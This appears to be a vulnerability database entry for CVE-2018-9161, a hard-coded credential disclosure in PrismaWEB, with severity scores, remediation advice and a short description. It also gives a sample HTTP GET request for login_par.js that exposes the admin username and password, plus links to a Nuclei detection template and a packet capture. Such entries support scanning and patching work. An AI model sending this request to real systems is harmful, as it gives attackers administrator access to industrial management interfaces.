| Title | PrismaWEB - Credentials Disclosure |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. |
| Remediation | Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. |
| CVSS Score | 9.8 |
| EPSS Score | 0.63057 |
| CVE ID | CVE-2018-9161 |
| CWE ID | CWE-798 |
| Tags | cve2018 cve prismaweb exposure edb prismaindustriale vuln |
PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
GET /user/scripts/login_par.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-9161.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-9161.pcap
N/AN/A